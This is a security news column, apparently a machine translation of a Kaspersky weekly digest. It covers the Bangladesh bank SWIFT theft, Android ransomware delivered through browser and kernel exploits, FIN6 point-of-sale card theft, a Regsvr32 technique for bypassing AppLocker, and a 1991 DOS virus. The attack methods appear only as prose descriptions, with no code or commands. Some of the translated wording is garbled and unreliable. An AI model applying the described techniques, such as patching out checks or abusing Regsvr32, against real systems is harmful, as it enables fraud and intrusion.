Security Week 17: Hacking SWIFT and cash registers, soliciting Android with exploits, bypassing AppLocker

Financial cyber fraud often affects ordinary people, bank customers, but as a result, financial institutions themselves experience problems. From the fact that user devices attack is easier than the banking infrastructure, everyone suffers. But there are exceptions: the Carbanak campaign, discovered by our experts last year, the fresh attacks of Metel, GCMan and the Carbanak 2.0 campaign , which is more focused on the clients of the (large) ones. Add to this the high-tech robbery of the central bank of the Republic of Bangladesh, which occurred in February of this year. Certainly, such attacks require significantly more skills and exp , than fraud with users' wallets, but you can hit the jackpot too much (or go to jail for a longer time, as lucky).

This week, the bank robbery story continued: the technical details of the attack became known. It turned out that the robbers directly manipulated the software of the international payment system SWIFT. That is, it is not only a matter of the vulnerability of the infrastructure of a particular bank: all large financial organizations are subject to such an attack in varying degrees. Back to the technique later, this story is worth telling from the beginning.

So, on technology alone, even the coolest, the crackers would not have gone far: the theft of tens of millions of dollars in any case will be noticed quickly. The attack took place somewhere between February 4 and 5, on the eve of the weekend (in Bangladesh it is Friday and Saturday). A total of 32 transactions were made for a total amount under a billion dollars. Of these, 30 transactions were identified and blocked — they managed, despite the day off. Two transfers, in amounts of $ 21 and $ 80 million, respectively, to Sri Lanka and the Philippines, were successful.

The transfer to Sri Lanka was subsequently returned thanks to a banal typo. Directing funds to a local nonprofit organization, the organizers of the attack made a mistake in the word “foundation” (fandation instead of foundation), and the German Deutsche Bank serving as an intermediary stopped the “pending clarification” transaction. In the Philippines, everything worked out. The Bank of Bangladesh notified the local RCBC bank of the fact of fraud, but if the attack itself was made possible by Muslim holidays, the Philippine bank employees were prevented from taking measures in time for the Chinese New Year. When at last everyone went to work, someone had already withdrawn from the account 58.15 million dollars for false documents. I wonder how the process of withdrawing $ 58 million from a bank account looks like?
')
Details of the attack became known only recently. On April 22, local police shared their data, and according to officials, there was ... no security at the bank. With physical security, everything was not bad: all operations with the SWIFT system were carried out from a separate and, apparently, carefully guarded premises. Reports on all electronic transactions must be printed.



At the network level, SWIFT operations were isolated or poorly, or not at all, judging by the scant statements of the police. The 10-dollar baud switches were mentioned, the lack of a firewall (apparently between the SWIFT infrastructure and everything else, including the Internet). The police tend to blame both the bank itself and representatives of the international payment system: the latter suddenly found out that SWIFT operations are not protected when it was already late. It is quite expected that, in principle, the bank could not understand how the leak occurred ( and what it all was ) until experts were invited for analysis. By the way, the difference between the presence of protection systems and their absence (or incorrect implementation). You can even hack a protected system, but in an unprotected one you can also cover the traces so as to make further investigation as difficult as possible.

Well, now turn to the technique. A detailed analysis of the tools for the attack was carried out by the company BAE Systems, and then a direct attack on the specialized SWIFT software was revealed. Robbers could act differently: to seize control of a computer connected to the payment system, and continue to do the wiring "hands", but went more difficult and reliable way. The malicious code intercepted SWIFT system messages, looked for predefined sequences of characters in them, in general, conducted reconnaissance.

For the attack, the crackers replaced the standard modules of the payment system and cut off part of the checks. An illustrative example is also given: to disable one of the checks, which, presumably, the fraudulent translation could not get through, it was enough to change two bytes, removing the conditional jump from the code.



It also turned out to be easy to deceive an additional security measure with the obligatory printing of transactions on the printer. For printing, the system generates files with the necessary information, and the malware simply scored these files with zeros, that is, not only blocked the printing, but also erased the information in digital form.

My colleagues at Threatpost asked for a comment from SWIFT, and received a response that was very similar to the usual reaction of financial organizations to the facts of fraud from ordinary customers.



In a sense, the attack did not reveal vulnerabilities in the SWIFT infrastructure, it’s about the unsafe environment of the client; in short, the problem is not on our side . And they are right, but this is such a rightness that will not help anyone. I do not think that there will be many such incidents, and most likely from this whole story, conclusions have already been made: there are not so many places where it is possible to steal a billion in one fell swoop. But the "consumer" cyber fraud, attacks on heterogeneous banks, customers for mere mortals, small and large businesses, will become more. To deal with it is more difficult, but necessary.

Unusual ransomware Trojan for Android with Exploits Included
News Blue Coat research .

Extortionists for ordinary computers use exploits in full force, although they are not limited to them. But on mobile devices, until recently, the situation looked different: for the initial infection, the attackers rely more on social engineering methods. But the threat landscape for Android is developing in the same spiral as the attacks on the PC, just much faster. This means that the appearance of malware for smartphones and tablets that are installed without the owner’s help is inevitable. And they did appear. A curious sample of such a ransomware Trojan was analyzed by experts from Blue Coat. The extortionist, known as Cyber.Police, attacks devices from Android versions 4.x and is an extortioner, but not a cryptographer. The data are not taken hostage, the device is simply blocked and the ransom puppies are required to be bought with iTunes payment cards for $ 200.



Much more interesting, as the extortionist gets on the device. To do this, use two exploit. The first exploit lbxslt allows you to take control of the device after viewing the site with an infected script in a regular browser. This exploit, along with a number of others, was stolen from the Hacking Team last year. The second, known as Towelroot, exploits a vulnerability in the Linux kernel up to 3.4.15 ( CVE ) and is in fact a modification of a once popular utility for gaining root rights. At this stage, a malicious application, the Trojan itself, is installed, with the suppression of standard messages about the appearance of a new app in the system.

According to Google itself, more than half of the devices still work on various versions of Android 4.x. In an interview with Threatpost, Blue Coat researcher Andrew Brandt compared this version of Android with Windows XP - by perception this is an outdated system that is not supported by most vendors and is extremely vulnerable. Meanwhile, Windows XP was released 15 years ago, and the latest version of Android 4.x (KitKat) - 2.5 years ago. Progress is moving by leaps and bounds, but in this context it somehow does not inspire at all.

Group FIN6 attacks POS-terminals, successfully stole data of 20 million credit cards
News FireEye study .

FireEye research on the activities of the group, known as FIN6, does not reveal America: yes, checkout point terminals, and steal money. Such operations are developed according to the targeted attack scenario: the corresponding master keys are selected for the victim’s infrastructure, and then the malware finds specialized computers and begins intercepting data. The story is interesting in context. After similar attacks on the largest US retail chains (the Target network has distinguished the most), the United States began a long and painful transition to the chip card payment system common in Europe (and we, too).

EMV cards are much better protected and attacks like FIN6 are not necessarily susceptible (although options are possible). So, in connection with this, a US-oriented cybercrime started a party on a sinking ship. Chip-and-pin companies that have introduced a system report a noticeable decrease in the number of incidents related to fraud, while those who are late report a growth of an average of 11% . Since buyers do not have the habit of refusing to buy in places where they still scan the magnetic strip with credit cards, it turns out that this temporary transitional period will be more dangerous for residents and guests of the United States than before or after. However, the recommendation on the use of one-time cards for payment during trips is unlikely to be canceled even when absolutely everyone switches to chip cards.

What else happened:
Windows-built Regsvr32 can be used to download and run arbitrary code to bypass security systems, in particular, AppLocker. Fortunately, this is still the Proof of Concept from the researcher, and technically it cannot even be called a vulnerability, rather using standard system tools in an unnatural way.

Antiquities:
"Astra-976"

A very dangerous resident virus, encrypted, is written to the COM files of the current directory when the infected file is started and then into all COM files that are launched for execution. If at the start of the file the system clock shows 17 minutes, then the virus encrypts (XOR 55h) the partitioning table in the MBR of the hard drive. Traces int21h. It contains the lines: "© AsTrA, 1991", "(2)".

Quote from the book "Computer viruses in MS-DOS" Eugene Kaspersky. 1992 Page 26.

Disclaimer: This column reflects only the personal opinion of its author. It may coincide with the position of Kaspersky Lab, or it may not coincide. Then how lucky.